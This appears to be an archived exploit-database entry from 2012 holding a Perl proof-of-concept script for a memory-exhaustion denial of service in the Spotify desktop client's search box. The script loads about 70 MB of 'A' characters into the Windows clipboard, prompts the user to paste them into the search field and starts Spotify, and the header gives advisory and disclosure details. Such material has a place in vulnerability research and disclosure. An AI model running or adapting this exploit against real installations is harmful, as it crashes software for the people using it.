Spotify – search func Memory Exhaustion

  • 作者: LiquidWorm
    日期: 2012-03-23
  • 类别:
  • 来源:
  • #!/usr/local/bin/perl
    # Spotify (search func) Memory Exhaustion Exploit
    # Vendor: Spotify Ltd
    # Product web page:
    # Affected version:
    # Summary: Think of Spotify as your new music collection. Your
    # library. Only this time your collection is vast: millions of
    # tracks and counting. Spotify comes in all shapes and sizes,
    # available for your PC, Mac, home audio system and mobile phone.
    # Wherever you go, your music follows you.
    # Desc: The vulnerability is caused due to the Search box function
    # not checking the boundary of user input. This can be exploited to
    # cause a DoS due to memory exhaustion when inserting a long string
    # of bytes (~80mil B / 80 MB) into the Search field in the GUI.
    # Tested on: Microsoft Windows XP Professional SP3 (EN) (32bit)
    #Microsoft Windows 7 Ultimate SP1 (EN) (64bit)
    # Vulnerability discovered by Claes Spett
    # Coded by LiquidWorm
    # Vendor status:
    # [19.03.2012] Vulnerability discovered.
    # [22.03.2012] Vendor has some knowledge about the issue.
    # [23.03.2012] Public security advisory released.
    # Advisory ID: ZSL-2012-5082
    # Advisory URL:
    # 21.03.2012
    use Win32::Clipboard; $leepy = Win32::Clipboard();
    print "\n[i] Clearing your Clipboard data...\n";
    sleep 2; print "\n - Done!\n"; sleep 1; $leepy->Empty();
    $tring = "\x41" x 70000000; $leepy->Set($tring);
    print "\n\n*----- Log In and just Paste \/ CTRL+V";
    print " into the search box -----*\n\n";
    system pause; print "\n\n[*] Starting Spotify\n"; sleep 1;
    system('start C:\\Docume~1\\%username%\Applic~1\\Spotify\\spotify.exe');